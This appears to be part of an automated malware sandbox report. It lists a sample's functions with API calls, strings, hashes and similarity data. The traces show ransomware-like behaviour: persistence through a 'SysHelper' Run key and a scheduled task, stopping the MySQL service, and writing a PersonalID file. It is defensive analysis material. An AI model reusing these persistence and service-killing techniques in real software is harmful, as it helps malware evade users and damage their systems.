                                                                                      • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                      • GetDesktopWindow.USER32 ref: 004549FB
                                                                                      • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                      • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                      • _wcsstr.LIBCMT ref: 00454A8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                      • String ID: Service-0x$_OPENSSL_isservice
                                                                                      • API String ID: 2112994598-1672312481
                                                                                      • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                      • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00454AE0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                      • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                      • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                        • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                      • vswprintf.LIBCMT ref: 00454B5D
                                                                                      • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                      • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                      • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                      • MessageBoxA.USER32 ref: 00454BD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                      • String ID: OPENSSL$OpenSSL: FATAL
                                                                                      • API String ID: 277090408-1348657634
                                                                                      • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                      • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412360, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                      Strings
                                                                                      • SysHelper, xrefs: 004123D6
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                      • API String ID: 122392481-4165002228
                                                                                      • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                      • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00418000, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                      • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040DAC0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                      • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                      • lstrcpyW.KERNEL32 ref: 0040DBD6
                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                      • _memset.LIBCMT ref: 0040DC38
                                                                                      • CoUninitialize.OLE32 ref: 0040DC92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                      • String ID: --Task$Comment$Time Trigger Task
                                                                                      • API String ID: 330603062-1376107329
                                                                                      • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                      • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                      • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                      • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00411A10, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                      • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                      • Sleep.KERNEL32(?), ref: 00411A75
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                      • String ID: MYSQL
                                                                                      • API String ID: 2359367111-1651825290
                                                                                      • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                      • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                      • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                      • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0044F26C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                        • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                      • String ID: bad function call
                                                                                      • API String ID: 2464034642-3612616537
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C740, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                      • _fgetws.LIBCMT ref: 0040C7BC
                                                                                      • _memmove.LIBCMT ref: 0040C89F
                                                                                      • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                      • API String ID: 2864494435-54166481
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040F310, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                      • API String ID: 2574300362-2555811374
                                                                                      • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                      • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040CBA0, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                      • API String ID: 1783060780-3771355929
                                                                                      • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                      • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00463350, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                      • API String ID: 909875538-2908105608
                                                                                      • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                      • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004C5D39, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                        • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                        • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                        • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                        • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                        • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                      • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                      • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                      • __invoke_watson.LIBCMT ref: 004C5D9B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                      • __invoke_watson.LIBCMT ref: 004C5DEB
                                                                                      Strings
                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                      • API String ID: 2139067377-798102604
                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C6A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                      • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseValue$OpenQuery
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                      • API String ID: 3962714758-1667468722
                                                                                      • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                      • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004573F0, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                      • API String ID: 1302938615-3129329331
                                                                                      • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                      • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00440DD7, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00440DE5
                                                                                      • __shift.LIBCMT ref: 00440E45
                                                                                      • _memmove.LIBCMT ref: 00440F00
                                                                                      • __invoke_watson.LIBCMT ref: 00440F22
                                                                                        • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                      • __fltout2.LIBCMT ref: 00440F55
                                                                                        • Part of subcall function 00448DCF: ___dtold.LIBCMT ref: 00448DF3
                                                                                        • Part of subcall function 00448DCF: _$I10_OUTPUT.LIBCMT ref: 00448E0E
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Locale$FeatureI10_PresentProcessorUpdateUpdate::____dtold__fltout2__getptd_noexit__invoke_watson__shift_memmove
                                                                                      • String ID: e+000
                                                                                      • API String ID: 1950323913-1027065040
                                                                                      • Opcode ID: 4aab24fa332338ded8e28756c8d48da1e1a79256754183a9b5f45fe68276ae34
                                                                                      • Instruction ID: 61e1f76fd18929e88c824d171d6639451d133659e2a5b2c773bd3f109f816237
                                                                                      • Opcode Fuzzy Hash: 4aab24fa332338ded8e28756c8d48da1e1a79256754183a9b5f45fe68276ae34
                                                                                      • Instruction Fuzzy Hash: FA5156317002489FE721DE29CC41AAF7BA5EF55314F1885AFFA448B282D739DC25CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00411B10, Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                      • String ID:
                                                                                      • API String ID: 3697694649-0
                                                                                      • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                      • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                      • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                      • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004506A0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                      • API String ID: 601868998-2416195885
                                                                                      • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                      • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0045AE30, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                      • API String ID: 2102423945-3653307630
